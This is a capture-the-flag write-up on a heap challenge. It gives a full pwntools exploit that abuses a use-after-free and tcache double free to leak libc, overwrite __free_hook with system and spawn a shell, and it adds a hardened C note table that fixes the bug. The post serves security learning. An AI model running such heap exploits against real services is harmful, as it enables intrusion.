Since passing 300 problems, the hard ones turn up nothing when you search for them, but there are also extremely simple ones, and today I hit one.
Overview:
- A program written in C++; one string in the disassembly is a meter long
- Check: the 6 input characters, each XORed with 6-i, must produce H@QRPN
- free does not clear the pointer (UAF)
Steps:
- Enter "NEUQRO" to start
- Allocate 0x80, 0x70, 0x10 (/bin/sh\x00)
- free the 0x90 chunk eight times and the 0x70 chunk twice; show 0 to get libc
- Allocate 0x70 three times, writing free_hook, x, system in turn
- free 1
```python
from pwn import *

elf = ELF('./pwn')
context.arch = 'amd64'

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF('/home/shi/pwn/libc6_2.27-3u1/lib64/libc-2.27.so')
    one = [0x4240e, 0x42462, 0xe31ee]
    offset = 0x3b12a0  # __libc_IO_vtables:00000000003B12A0 _IO_file_jumps
else:
    p = remote('node4.buuoj.cn', 25510)
    libc_elf = ELF('../libc6_2.27-3ubuntu1_amd64.so')
    one = [0x4f2c5, 0x4f322, 0x10a38c]
    offset = 0x3e82a0  # __libc_IO_vtables:00000000003E82A0 _IO_file_jumps

# Name check: each byte of H@QRPN XORed with 6-i gives the expected input
# [print(chr(v^(6-i)), end='') for i,v in enumerate(b'H@QRPN')]
p.sendlineafter(b'name', b"NEUQRO")

menu = b'> \n'

def add(size, msg):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b'input the size\n', str(size).encode())  # <=0x100
    p.sendlineafter(b"now you can input something...\n", msg)

def free(idx):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b'input the index\n', str(idx).encode())  # UAF: slot pointer is not cleared

def show(idx):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b'input the index\n', str(idx).encode())

add(0x80, b'A')            # idx 0, chunk size 0x90
add(0x10, b'/bin/sh\x00')  # idx 1, later passed to free -> system
add(0x70, b'A')            # idx 2, chunk size 0x80
[free(2) for _ in range(2)]  # double free idx 2 into tcache
[free(0) for _ in range(8)]  # tcache holds 7; the 8th free lands in the unsorted bin, fd -> main_arena
show(0)
malloc_hook = u64(p.recvuntil(b'\x7f', drop=False).ljust(8, b'\x00')) - 0x60 - 0x10
libc_base = malloc_hook - libc_elf.sym['__malloc_hook']
system = libc_base + libc_elf.sym['system']
free_hook = libc_base + libc_elf.sym['__free_hook']
print('libc:', hex(libc_base))

context.log_level = 'debug'
add(0x70, p64(free_hook))  # first alloc returns the doubly-freed chunk; its tcache next pointer now points at __free_hook
#gdb.attach(p)
#pause()
add(0x70, b'A')            # same chunk handed out again
add(0x70, p64(system))     # this alloc returns __free_hook itself; overwrite it with system
free(1)                    # free("/bin/sh") -> system("/bin/sh")
p.sendline(b'cat /flag')
p.interactive()
```
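The root cause behind the steps above is the free routine leaving the slot pointer in the table. As an added example that is not code from the post or from the challenge binary, here is that unsafe pattern next to a hardened note table that validates the index, refuses empty slots and clears the pointer (the function and constant names are assumptions):

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_NOTES 16
#define MAX_SIZE  0x100   /* the menu in the write-up caps sizes at 0x100 */

static char *notes[MAX_NOTES];

/* Unsafe pattern described in the write-up: the chunk is freed but the
 * table still holds the pointer, so a second free or a show on the same
 * index operates on freed memory (double free / use-after-free). */
void note_free_unsafe(int idx) {
    free(notes[idx]);          /* notes[idx] keeps pointing at the freed chunk */
}

/* Hardened version: reject out-of-range indices and empty slots, then
 * null the slot so the same chunk can never be freed or shown again. */
int note_free(int idx) {
    if (idx < 0 || idx >= MAX_NOTES || notes[idx] == NULL)
        return -1;             /* second free on this index ends up here */
    free(notes[idx]);
    notes[idx] = NULL;
    return 0;
}

/* Allocate into an empty slot; zero-filled so show() never leaks stale data. */
int note_add(int idx, size_t size, const char *msg) {
    if (idx < 0 || idx >= MAX_NOTES || notes[idx] != NULL ||
        size == 0 || size > MAX_SIZE)
        return -1;
    notes[idx] = calloc(1, size);
    if (notes[idx] == NULL)
        return -1;
    strncpy(notes[idx], msg, size - 1);  /* calloc left the final byte as terminator */
    return 0;
}

/* Returns the note, or NULL for an empty/freed slot instead of reading
 * heap metadata out of a freed chunk (the libc leak in the write-up). */
const char *note_show(int idx) {
    if (idx < 0 || idx >= MAX_NOTES)
        return NULL;
    return notes[idx];
}
```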